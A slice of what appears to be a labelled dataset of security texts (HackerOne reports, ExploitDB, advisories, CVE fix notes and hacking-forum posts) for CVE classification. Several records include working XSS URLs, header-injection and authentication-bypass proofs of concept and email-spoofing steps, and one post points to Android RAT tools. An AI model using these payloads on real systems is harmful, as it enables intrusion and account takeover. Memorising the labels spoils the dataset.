Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nhttps://████████/██████onload=%22prompt(1)\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "cefc742e963c1a9a3b87", "text": "[Improper Authentication - Generic] App PIN code can be bypassed in Files iOS\n\nHi Team,\n\nHope you are doing great.\n\nNote: IoS APP Vs.: 4.9.1\n\nI got a vulnerability in your applications via which an attacker is able to bypass the PIN.\nThe attacker just need to bruteforce the 4 digit PIN as unlimited tries is accepted by the application, the attacker can simply do a bruteforce and access the application.\n\nPoC:\n{F2844276}\n\n## Impact\n\nAuthentication Bypass leading to application access", "source": "hackerone", "timestamp": "2023-12-18", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "4cca5f83233e6541620b", "text": "[Incorrect Authorization] Support Tickets can be created on behalf of other users using spoofed email | Bypass of #2001913\n\n**Summary:**\nHi team,\nHope you are doing well.I came across a disclosed report by hackerone (#2001913) wherein a researcher was able to create a support ticket on behalf of other users by sending fake email to support@hackerone.com. The issue was fixed by hackerone and sending email to support@hackerone.com does not create support tickets anymore.But,there is a bypass to this fix.\n**Description:**\nHackerone uses freshdesk as their third party service provider to handle support tickets .In freshdesk if a email is sent to support@domain.freshdesk.com it would create support tickets on behalf of the user.Similarly,if an email is sent to support@hackerone.freshdesk.com using a fake mailer like https://emkei.cz then a support ticket is created by an attacker for the victim.\n\n### Steps To Reproduce\n1. Visit https://emkei.cz or any other fake mailer website.\n2. Put the victim email in from field and support@hackerone.freshdesk.com in the to field.\n3. Fill in the body with any message like account deletion and support ticket would be created in the behalf of victim and the support team will take it as legitimate request and process the request .\n\n### Mitigation:\n1.Freshdesk has a fix to the issue such that only emails sent to particular email address will only create tickets.The feature is called **Prevent Wildcard Ticket Create**.More deatils at https://support.freshdesk.com/en/support/solutions/articles/50000000652-receiving-spam-emails-to-support-domain-freshdesk-com-please-help-\n\n\n### Optional: Supporting Material/References (Screenshots)\n\n * Screenshot attached.██████\n* Check ticket **471406** created by me on a test account of mine.\n\n## Impact\n\n1.It is possible to perform sensitive action on behalf of victim .\n2.Ability to spam the support inbox thus increasing the wait time and leading to inconvenience for legitimate users.", "source": "hackerone", "timestamp": "2023-09-08", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "e2397f8b82b2696d1960", "text": "[Improper Authorization] CVE-2023-47037: Airflow Broken Access Control Vulnerability\n\nHi IBB,\nApache Airflow, versions before 2.7.3, is affected by a vulnerability that allows authenticated and DAG-view authorized Users to modify some DAG run detail values when submitting notes. This could have them alter details such as configuration parameters, start date, etc. \n\n\nHere is the conversation between the security team of airflow.\n\n█████\n\nMore Details:\nhttps://lists.apache.org/thread/04y4vrw1t2xl030gswtctc4nt1w90cb0\n\n## Impact\n\nBroken Access Control Vulnerability.", "source": "hackerone", "timestamp": "2023-11-29", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "f5b67e8e98243b4b74e4", "text": "[Cross-site Scripting (XSS) - Generic] [accounts.reddit.com] Redirect parameter allows for XSS\n\n## Summary:\nHello team! I was tampering with the dest parameter in accounts.reddit.com and found out it is vulnerable to Cross Site Scripting once the victim performs the log in.\n\n## Steps To Reproduce:\n 1. Enter to the following link: ```https://accounts.reddit.com/?dest=javascript:alert(document.domain)```\n - If not signed in, the user will be promped to log in and after doing so XSS will excecute\n\n{F2315850}\n - If user is logged into his account, following the link will also make the XSS pop up\n\n{F2315847}\n\n## Impact\n\nAn attacker could trick users into executing XSS, executing code and stealing their cookies only by them logging in.", "source": "hackerone", "timestamp": "2023-05-18", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "7beebebed0831ebe5ce0", "text": "[Business Logic Errors] CVE-2023-27538: SSH connection too eager reuse still\n\nlibcurl would reuse a previously created connection even when an SSH related option had been changed that should have prohibited reuse.\n\nlibcurl keeps previously used connections in a connection pool for subsequent transfers to reuse if one of them matches the setup. However, two SSH settings were left out from the configuration match checks, making them match too easily.\n\n## Hackerone report\n#1898475\n\n## Impact\n\nConnection reuse when different ssh keys are specified.", "source": "hackerone", "timestamp": "2023-04-19", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "72914b7d3e3a005f9d44", "text": "[Business Logic Errors] CVE-2023-27535: FTP too eager connection reuse\n\nlibcurl would reuse a previously created FTP connection even when one or more options had been changed that could have made the effective user a very different one, thus leading to the doing the second transfer with wrong credentials.\n\nlibcurl keeps previously used connections in a connection pool for subsequent transfers to reuse if one of them matches the setup. However, several FTP settings were left out from the configuration match checks, making them match too easily. The settings in questions are CURLOPT_FTP_ACCOUNT, CURLOPT_FTP_ALTERNATIVE_TO_USER, CURLOPT_FTP_SSL_CCC and CURLOPT_USE_SSL level.\n\n## Hackerone report\n#1892780\n\n## Impact\n\nAccessing content with wrong cached credentials.", "source": "hackerone", "timestamp": "2023-03-20", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "4d315d3534d6f12f4722", "text": "[HTTP Response Splitting] RubyのCGIライブラリにHTTPレスポンス分割(HTTPヘッダインジェクション)があり、秘密情報が漏洩する\n\nPoC1:\n```\n#!/usr/bin/env ruby\nrequire 'cgi'\ncgi = CGI.new\nurl = \"http://example.jp\\r\\nSet-Cookie: foo=bar;\" # External Parameter\nprint cgi.header({'status' => '302 Found', 'Location' => url})\n```\n\nActual Result1:\n```\n$ curl -s -i http://localhost:8080/cgi-bin/cgi.ru\nHTTP/1.1 302 Found\nDate: Fri, 21 May 2021 00:46:33 GMT\nServer: Apache/2.2.31 (Unix)\nSet-Cookie: foo=bar;\nLocation: http://example.jp\nContent-Length: 0\nContent-Type: text/html\n\n```\n\nこのケースでは不正なクッキーが注入される。\n\n\nPoC2:\n```\n#!/usr/bin/env ruby\nrequire 'cgi'\ncgi = CGI.new\nurl = \"http://example.jp\\r\\nStatus: 500\\r\\n\\r\\n\" # External Parameter\nprint cgi.header({'status' => '302 Found', 'Location' => url})\n```\n\nActual Result2:\n```\n$ curl -s -i http://localhost:8080/cgi-bin/cgi.ru\nHTTP/1.1 500 Internal Server Error\nDate: Fri, 21 May 2021 00:49:44 GMT\nServer: Apache/2.2.31 (Unix)\nLocation: http://example.jp\nConnection: close\nTransfer-Encoding: chunked\nContent-Type: text/html\n\n\n\n```\n\nこのケースでは500 Internal Server Errorのため、Locationヘッダは無視され、JavaScriptが実行される。\n\n## Impact\n\n意図しないHTTPレスポンスヘッダやHTTPレスポンスボディを外部から注入できます。\n単純なHTTPヘッダインジェクションでは、クッキーのインジェクションやリダイレクト等が主な影響となりますが、このケースでは、レスポンスボディが注入できるため、不正なJavaScript実行に及ぶため、影響が大きいと考えます。\n\n他の言語の場合、PHPのheader関数は \"\\r\" \"\\n\" \"\\r\\n\" 等をすべてエラーにするため、上記の攻撃はできません。\n\n過去のWEBrickやPumaにも類似の脆弱性がありましたが、これらは単独のキャリッジリターン \"\\r\" による攻撃しかできず、リバースプロキシとしてNginxがあれば、Nginx側にてエラーになります。したがって、現実的な危険性はほとんどないと考えます。\n\nhttps://www.ruby-lang.org/en/news/2019/10/01/http-response-splitting-in-webrick-cve-2019-16254/\nhttps://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v\n\n一方、今回報告した問題は、CGIの仕様上ウェブサーバーやリバースプロキシ側でエラーにすることはできないため、影響が現実的です。", "source": "hackerone", "timestamp": "2022-11-24", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "58ec98b1caa634605cf9", "text": "[Unknown] Potential Authentication Bypass through \"autologin\" feature\n\n## Summary:\nThe vulnerability is located in the `/plugins/preloads/autologin.php` script:\n\n```\n45.\t\t\t$uname = $myts->stripSlashesGPC($autologinName);\n46.\t\t\t$pass = $myts->stripSlashesGPC($autologinPass);\n47.\t\t\tif (empty($uname) || is_numeric($pass)) {\n48.\t\t\t\t$user = false ;\n49.\t\t\t} else {\n50.\t\t\t\t// V3\n51.\t\t\t\t$uname4sql = addslashes($uname);\n52.\t\t\t\t$criteria = new icms_db_criteria_Compo(new icms_db_criteria_Item('login_name', $uname4sql));\n53.\t\t\t\t$user_handler = icms::handler('icms_member_user');\n54.\t\t\t\t$users = $user_handler->getObjects($criteria, false);\n55.\t\t\t\tif (empty($users) || count($users) != 1) {\n56.\t\t\t\t\t$user = false ;\n57.\t\t\t\t} else {\n58.\t\t\t\t\t// V3.1 begin\n59.\t\t\t\t\t$user = $users[0] ;\n60.\t\t\t\t\t$old_limit = time() - (defined('ICMS_AUTOLOGIN_LIFETIME') ? ICMS_AUTOLOGIN_LIFETIME : 604800);\n61.\t\t\t\t\tlist($old_Ynj, $old_encpass) = explode(':', $pass);\n62.\t\t\t\t\tif (strtotime($old_Ynj) < $old_limit || md5($user->getVar('pass') .\n63.\t\t\t\t\t\t\tICMS_DB_PASS . ICMS_DB_PREFIX . $old_Ynj) != $old_encpass)\n64.\t\t\t\t\t{\n65.\t\t\t\t\t\t$user = false;\n66.\t\t\t\t\t}\n```\n\nUser input passed through the \"autologin_uname\" and \"autologin_pass\" cookie values is being used at lines 51-54 to fetch an user object from the database, and then at lines 62-63 to check the correctness of the user's password. The vulnerability exists because of an unsafe way of comparing those parameters, due to comparison operator `!=` is being used instead of `!==` within the “if” statement at lines 62-63. The latter operator returns “true” only if the compared values are equal and the same type, while the first compare the values after “[type juggling](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Type%20Juggling)”. This might be exploited to bypass the authentication mechanism and login as any user without the knowledge of the relative password.\n\n## ImpressCMS branch :\nThe vulnerability has been spotted on ImpressCMS version 1.4.2 (the latest at the time of writing).\n\n## Steps To Reproduce:\nUse the attached Proof of Concept (PoC) script to reproduce this vulnerability. It's a PHP script supposed to be used from the command-line (CLI). You should see an output like the following:\n```\n$ php auth-bypass.php http://localhost/impresscms/ admin\n[-] Starting authentication bypass attack...\n[-] 2021-01-20 022141\n[-] You can autologin with the following cookies:\n[-] Cookie: autologin_uname=admin; autologin_pass=2021-01-20 022141:0\n```\n\n**NOTE**: the script will try to send multiple requests with incremental dates within the `autologin_pass` cookie (that will be the value of the `$old_Ynj` variable), and this will generate a different MD5 hash for each request, until something like `0e174892301580325162390102935332` will be returned by the `md5()` function. For this reason, the exploitation likelihood is very low, and the script execution might take days, months, or a theoretically infinite time.\n\n## Impact\n\nThis vulnerability could potentially be exploited to bypass the authentication mechanism and login without valid credentials.", "source": "hackerone", "timestamp": "2022-03-22", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "cd70c883d1d50daf71de", "text": "[Cross-site Scripting (XSS) - Reflected] RXSS on █████████\n\n**Description:**\nthe `WhatSubmitted` parameter not filtered, i can insert `\"` character and execute code JS\n\n## Impact\n\nPerform any action within the application that the user can perform.\nView any information that the user is able to view.\nModify any information that the user is able to modify.\nInitiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.\n\n## System Host(s)\n████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1. Open URL: [https://██████/SA1/SAReplay/default.asp?WhatSubmitted=Empty%22;-alert(%27tmz900%27)//&AgentID=0123&SARA=0&StartAt=07/06/22&StopAt=03/23/08](https://████████/SA1/SAReplay/default.asp?WhatSubmitted=Empty%22;-alert(%27tmz900%27)//&AgentID=0123&SARA=0&StartAt=07/06/22&StopAt=03/23/08)\n2. You will see an alert box pup up:\n\n██████████\n\n## Suggested Mitigation/Remediation Actions\nFilter input on arrival\nEncode data on output\nUse appropriate response headers\nContent Security Policy.", "source": "hackerone", "timestamp": "2022-09-06", "split": "val", "label_source": "within_source_cve_index", "label": 0} +{"id": "7ecfc11ad2c24a77856b", "text": "There are many proven methods, and I have listed some of them. A spoiler alert: content is necessary for increased website visitors. Always have a business blog section: Always focus on evergreen topics. You can talk about your niche, or futuristic technologies like IoT, ai services, big data etc. Create awsome visuals for blogs and news Incorporate videos for illustration purposes Focus on a certain set of keywords. Also, use long tail (LSI) keywords in the content and place them strategically. Always link your pages internally Improve the page speed through page optimisation Implement schema mark up Try to refresh your content on a regular basis Build backlinks from high domain-rated websites Promote the content on social media platforms If you have a LinkedIn page, publish blogs or informative content there too Start an online community to boost the traffic, and promote healthy discussions Participate in forum discussions, and post good content Run an email campaign Run PPC and social media campaigns Try to register on business listing websites Host webinars", "source": "go4expert", "timestamp": "2022-07-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "12c40b1a66f8b0a4b64a", "text": "It sounds like you're trying to determine which server you need to connect to in order to access the target server, but you don't have sufficient permissions to run certain tools on the current server. One approach you could try is to use the \"traceroute\" command to trace the path between the current server and the target server. Traceroute will show you the IP addresses of all the servers in the path between the two endpoints. To use traceroute, simply run the following command: traceroute targetserver.net This will display a list of all the servers between your current server and the target server, along with their IP addresses. You can then use this information to determine which server you need to connect to first in order to access the target server. Another approach is to use the \"nslookup\" command to query the DNS records for the target server. This can help you determine which servers are authoritative for the target domain, which may give you a clue as to which server you need to connect to first. To use nslookup, run the following command: nslookup targetserver.net This will display the DNS records for the target domain, including the authoritative name servers. You can then use this information to determine which server you need to connect to first. Note that both of these commands may require root privileges, so you may need to ask your system administrator for assistance if you don't have the necessary permissions.", "source": "go4expert", "timestamp": "2023-04-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c83e1658b2a166a217bb", "text": "Your level of interest and commitment will determine how serious you take it. You could quickly become an expert on something if you really wanted to learn it. There isn't anything or anyone that makes designing websites like the ones we use or the things we see every day so tough. Examples include Facebook, Google, Amazon, Flipkart, Snapdeal, and numerous others. When we consider it as a collection of graphical elements, such as various colors, font styles, images, card views, tables, animations, etc., we realise that scaring is natural. The word \"responsive\" websites is the most intriguing; these are websites that adjust their element spacing, alignments, and other attributes to", "source": "go4expert", "timestamp": "2023-02-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "70e128aef71abbdb7d1b", "text": "[Information Disclosure] [█████████] Information disclosure due unauthenticated access to APIs and system browser functions\n\n**Description:**\nMultiple information exposure vulnerabilites were identified in a Jira Server instance (unauthenticated access to APIs and system browser functions). This report describes a combination of two separate vulnerabilities in two separate services This chain of vulnerabilities allows unauthenticated attacker to run arbitrary code on a server inside the company's internal network. the vulnerable registered as references JRASERVER-73060\n\n\n## References\nhttps://jira.atlassian.com/browse/JRASERVER-73060\nhttps://nvd.nist.gov/vuln/detail/CVE-2020-14179\n\n## Impact\n\nUnauthorised access and the data should not be visible.\nProject categories, resolutions, and usernames are listed even if the API is not authenticated\n\n## System Host(s)\n███████\n\n## Affected Product(s) and Version(s)\n██████████\n\n## CVE Numbers\nCVE-2020-14179\n\n## Steps to Reproduce\n## Steps to Reproduce\n1. Navigate visit the target scope is https://██████████/secure/JiraCreditsPage!default.jspa\n 1. And now we found a directory is jira sensitive\n 1. Lets send a curl request to the `?maxResults=1000` endpoint, as shown below. In the request, point the post request to the server address you want to send the request to:\n\nHere's the HTTP Parameter request that the issue:\n```\nGET /rest/menu/latest/admin HTTP/1.1\nHost: ██████████\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\nsec-ch-ua-platform: \"Mac OS\"\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\n```\n * https://████/secure/JiraCreditsPage!default.jspa\n * https://█████████/rest/menu/latest/admin?maxResults=1000\n\n## Suggested Mitigation/Remediation Actions\n## Suggested Mitigation/Remediation Actions\nAnonymous access to endpoints listed below is restricted starting Jira 9.0. On future Jira 8.x releases and all LTS releases it is possible to restrict anonymous access with feature flags. On Jira 8.x to restrict anonymous access to the endpoint you need to disable feature flag aka provide ``.disabled On Jira 9.0 you need to enable the same feature flag aka provide ``.enabled\n\n\n**You can use given feature flags: **\n`/rest/api/2/projectCategory` - (Anonymous access disabled completely) \n`/rest/api/2/resolution` - (Anonymous access blocked only when there is no projects available for anonymous users) \n`/rest/menu/latest/admin` - There is currently no feature flag to disable anonymous access, please check linked ticket in \"duplicates by\" to track this problem.\n\n**Refferences**\nhttps://hackerone.com/reports/994612 \n[JRASERVER-73060](https://jira.atlassian.com/browse/JRASERVER-73060)", "source": "hackerone", "timestamp": "2023-09-29", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0a484a57a9abdc902525", "text": "Hello. Parrot has an open book archive that you can read and study: Index of /parrot/misc/misc/openbooks/ . After that you could go to hackthebox.com and practice there: https://academy.hackthebox.com", "source": "parrotsec", "timestamp": "2022-01-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f906fc15727508cdc85f", "text": "DoS vulnerability in bundled XStream library in Jenkins Core\n\n[Severity: MEDIUM]\n\nJenkins 2.333 and earlier, LTS 2.319.2 and earlier is affected by the XStream library’s vulnerability [CVE-2021-43859](https://x-stream.github.io/CVE-2021-43859.html). This library is used by Jenkins to serialize and deserialize various XML files, like global and job `config.xml`, `build.xml`, and numerous others.\n\nThis allows attackers able to submit crafted XML files to Jenkins to be parsed as configuration, e.g. through the `POST config.xml` API, to cause a denial of service (DoS).", "source": "github_advisory", "timestamp": "2022-02-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8b648153340cea85ff8b", "text": "Turn off and start the server again if this doesn’t work then use wsl and install beef and use hope it works", "source": "parrotsec", "timestamp": "2022-05-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2e781026a42fcd731a20", "text": "Finaly how can you reslove it. Can you show me detail, i stuck it 2 weks. Thanks! @XSSDoctor", "source": "hackthebox", "timestamp": "2022-07-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9baada4b63cebedfce8d", "text": "Hello @r0m4d , no haven’t had any luck with the last exercise. I used the rockyou-30 on g.potter. Used hydra on the victim machine, as well as remote from my attack box. But it didn’t work…", "source": "hackthebox", "timestamp": "2022-01-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "de4505219d3fe4cd7cf4", "text": "I used Lynis + Monitor Ports/Process for two days with Netsat/Nmap/ps. Checked Listen/Estabilished/SYN_SENT connection. I think everything is alright. I figured out that noise from fan was only when I have opened browser, when it was closed there was no noise. Will scan with clamaAV as sugessted because I wasn’t used it. By mistake I also probably kill/disable some process and broke my firefox, it now does not want to load websites now. I sudo apt --purge autoremove firefox and install it again but it still does not load websites, could you guys tell me what can I do now, I don’t want to open new topic for that, thanks.", "source": "parrotsec", "timestamp": "2022-02-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "000bcbf1b076ba94088d", "text": "SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)\n\n# Exploit Title: SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)\n# Date: 28/12/2021\n# Exploit Author: Momen Eldawakhly - Cyber Guy - (Resecurity Inc)\n# Vendor Homepage: https://www.safarimontage.com/\n# Version: 8.3 and 8.5\n# Tested on: Ubuntu Linux [Firefox]\n# CVE: CVE-2021-45425\n\n# Proof of Concept:\n\nGET /redirect.php?cmd=invalid%27%22()%26%25%3C/body%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&ret=3 HTTP/1.1\nHost: vulnIP\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: PHPSESSID=SSSION; lang=en\nConnection: close", "source": "exploitdb", "timestamp": "2022-01-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "baf200c5a1a21c1df6c7", "text": "CVE: CVE-2022-0514\n\n[{'lang': 'en', 'value': 'Business Logic Errors in GitHub repository crater-invoice/crater prior to 6.0.5.'}]\n\nFix commit: Fix tax per item issue & check currency key", "source": "cvefixes", "timestamp": "2022-03-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "fec28381822066a2d482", "text": "Would someone explain why my dnsenum keeps timing out: app.inlanefreight.htb. NS record query failed: query timed out running this: sudo dnsenum --dnsserver 10.129.18.15 --enum -p 0 -s 0 -o subdomains.txt -f /home/ethhack/Seclists/Discovery/DNS/fierce-hostlist.txt app.inlanefreight.htb. dnsenum VERSION:1.2.6", "source": "hackthebox", "timestamp": "2023-08-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b71b6f1611e38f572cf5", "text": "Hello everyone Who passed the “Default Credentials” part Who can remember. There it is necessary to redo the entire script that they propose to study in order to answer the question: “Inspect the login page and perform a bruteforce attack. What is the valid username?” I’m trying to put my data from the provided machine into it изображение 807×199 23.7 KB The script freezes, you have to interrupt it. and the error always appears the same:", "source": "hackthebox", "timestamp": "2022-07-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "61e3f8cd17d76fd5997f", "text": "[Unknown] CVE-2023-36617: ReDoS vulnerability in URI (Ruby)\n\nI made a report at https://hackerone.com/reports/1958260 .\n\nhttps://www.ruby-lang.org/en/news/2023/06/29/redos-in-uri-CVE-2023-36617/\n\n> A ReDoS issue was discovered in the URI component through 0.12.1 for Ruby. The URI parser mishandles invalid URLs that have specific characters. There is an increase in execution time for parsing strings to URI objects with rfc2396_parser.rb and rfc3986_parser.rb.\n\n> NOTE: this issue exists because of an incomplete fix for CVE-2023-28755.\n\n## Impact\n\nParsing of URIs may cause ReDoS.\nEspecially when using RFC2396_Parser, even Ruby 3.2.x is affected.", "source": "hackerone", "timestamp": "2023-08-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "347190a93c7ae75a82e0", "text": "I have the username and password but when I try to ssh in it just spins like it can’t connect to the IP? any thoughts? I tried using nmap to connect to the host just to make sure it was up and it says 0 hosts up?", "source": "hackthebox", "timestamp": "2023-01-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a888e5050a29ef21ecb9", "text": "hi, I have the same problem, i tried this but it doesn’t seem to be the answer : npm exec http-server – -p 8080 then i have : Starting up http-server, serving ./ http-server version: 14.1.1 http-server settings: CORS: disabled Cache: 3600 seconds Connection Timeout: 120 seconds Directory Listings: visible AutoIndex: visible Serve GZIP Files: false Serve Brotli Files: false Default File Extension: none Available on: http://127.0.0.1:8080 http://192.168.1.19:8080 Hit CTRL-C to stop the server", "source": "hackthebox", "timestamp": "2022-09-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c64ee220f2831a89e916", "text": "Hello this is Gulshan Negi Well, there are a lot of great data science courses out there. I will recommend that you can join the below courses. 1. Data Science Specialization by Johns Hopkins University on Coursera. 2. Data Science Essentials by Microsoft on edX. Thanks", "source": "go4expert", "timestamp": "2023-02-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4efd1a49ba2f4df49b8a", "text": "Yes, all options may not work - you may need to customize these repos to get these functional. You may try these, although no guarantee of working properly, I’m trying to help you: GitHub GitHub - karma9874/AndroRAT: A Simple android remote administration tool... A Simple android remote administration tool using sockets. It uses java on the client side and python on the server side - GitHub - karma9874/AndroRAT: A Simple android remote administration tool u... GitHub GitHub - Hax4us/haxRat: A Android RAT with lots of features , check README... A Android RAT with lots of features , check README for more information. - GitHub - Hax4us/haxRat: A Android RAT with lots of features , check README for more information. Android Gigs – 3 Sep 20 3 Best Android RAT Tools to Hack Android Phone Remotely Download Now List of best android rat tools to hack any android phone remotely. Download three best android rat tools. Best rat for android. Est. reading time: 3 minutes", "source": "parrotsec", "timestamp": "2022-01-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4138cc1d0bb900eed4f8", "text": "Three start point\n\nHi every one. Can i ask for the machine Three in start point is still alive. How i can use the command=id. I upload shell.php already but the url is not work for use cmd. I try 10 times but it is same problem. I do not have any idea for that. any one can help me plssssss!!! get /shell.php?command=id HTTP/1.1 response : HTTP/1.1 404 Not Found I had checked in aws in thetoppers.htb, there was shell.php aleady.", "source": "hackthebox", "timestamp": "2023-10-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b79418b34b8b4a77e767", "text": "jplayer Cross Site Scripting vulnerability\n\n[Severity: MEDIUM]\n\nMultiple cross-site scripting (XSS) vulnerabilities in actionscript/Jplayer.as in the Flash SWF component (jplayer.swf) in jPlayer before 2.3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) jQuery or (2) id parameters, a different vulnerability than CVE-2013-1942 and CVE-2013-2023, as demonstrated by using the alert function in the jQuery parameter. NOTE: these are the same parameters as CVE-2013-1942, but the fix for CVE-2013-1942 uses a blacklist for the jQuery parameter.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e9980305fe7d4f3484c3", "text": "Hi Armitage is helpful because it have a GUI, but it’s old and no longer updated since a few years, you can use it to hack a Windows7 or older…", "source": "parrotsec", "timestamp": "2023-07-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3377570ca01d8a60072b", "text": "CVE: CVE-2022-2207\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5162: reading before the start of the line with BS in Replace mode\n\nProblem: Reading before the start of the line with BS in Replace mode.\nSolution: Check the cursor column is more than zero.", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f899e34341fe3224107b", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8541, CVE-2018-8542, CVE-2018-8543, CVE-2018-8551, CVE-2018-8556, CVE-2018-8557, CVE-2018-8588.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "df1a6dce44b89c6ee4d6", "text": "CVE: CVE-2022-29220\n\n[{'lang': 'en', 'value': 'github-action-merge-dependabot is an action that automatically approves and merges dependabot pull requests (PRs). Prior to version 3.2.0, github-action-merge-dependabot does not check if a commit created by dependabot is verified with the proper GPG key. There is just a check if the actor is set to `dependabot[bot]` to determine if the PR is a legit PR. Theoretically, an owner of a seemingly valid and legit action in the pipeline can check if the PR is created by dependabot and if their own action has enough permissions to modify the PR in the pipeline. If so, they can modify the PR by adding a second seemingly valid and legit commit to the PR, as they can set arbitrarily the username and email in for commits in git. Because the bot only checks if the actor is valid, it would pass the malicious changes through and merge the PR automatically, without getting noticed by project maintainers. It would probably not be possible to determine where the malicious commit came from, as it would only say `dependabot[bot]` and the corresponding email-address. Version 3.2.0 contains a patch for this issue.'}]\n\nFix commit: Merge pull request from GHSA-v5vr-h3xq-8v6w\n\n* fix: add pr commit author check\n\n* chore: update prettier settings\n\n* chore: update prettier settings\n\n* feat: add verify commit signatures\n\n* chore: revert prettier\n\n* test: add action test\n\n* refactor: remove commits fallback\n\n* test: add verify test\n\n* feat: add spawn gpg\n\n* Fixing PR comments: Moved import from func to global; Iterate with hwp; Added GPG information to ReadMe\n\n* Removing Key from files\n\n* Fixing node_modules\n\n* different approach to validating the commit. Checking that the commit is verified, the author is dependabot[bot], the committer is GitHub\n\n* Adding fixes to tests\n\n* Fix for the tests\n\n* eslint, naming and removal of magic text\n\n* chore: formatting\n\n* Refactored tests\n\n* Removed unecessary async function. Iterating through very small amounts of commits.Renamed file for consistency\n\n* removed unecessary dependency\n\nCo-authored-by: marceloFerreira90 \nCo-authored-by: marceloFerreira90 \nCo-authored-by: Simone Busoli ", "source": "cvefixes", "timestamp": "2022-05-31", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "3e87c422fcb5c8bbf782", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2023-10-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b952c6dc1ebe14b93371", "text": "CVE: CVE-2022-1445\n\n[{'lang': 'en', 'value': 'Stored Cross Site Scripting vulnerability in the checked_out_to parameter in GitHub repository snipe/snipe-it prior to 5.4.3. The vulnerability is capable of stolen the user Cookie.'}]\n\nFix commit: Escape checkout target name\n\nSigned-off-by: snipe ", "source": "cvefixes", "timestamp": "2022-04-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "762152664ca1c287bf79", "text": "CVE: CVE-2022-31623\n\n[{'lang': 'en', 'value': 'MariaDB Server before 10.7 is vulnerable to Denial of Service. In extra/mariabackup/ds_compress.cc, when an error occurs (i.e., going to the err label) while executing the method create_worker_threads, the held lock thd->ctrl_mutex is not released correctly, which allows local users to trigger a denial of service due to the deadlock.'}]\n\nFix commit: MDEV-26561 mariabackup release locks\n\nThe previous threads locked need to be released too.\n\nThis occurs if the initialization of any of the non-first\nmutex/conditition variables errors occurs.", "source": "cvefixes", "timestamp": "2022-05-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "1d25226f3ae4dcebe02f", "text": "CVE: CVE-2022-2345\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository vim/vim prior to 9.0.0046.'}]\n\nFix commit: patch 9.0.0047: using freed memory with recursive substitute\n\nProblem: Using freed memory with recursive substitute.\nSolution: Always make a copy for reg_prev_sub.", "source": "cvefixes", "timestamp": "2022-07-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": 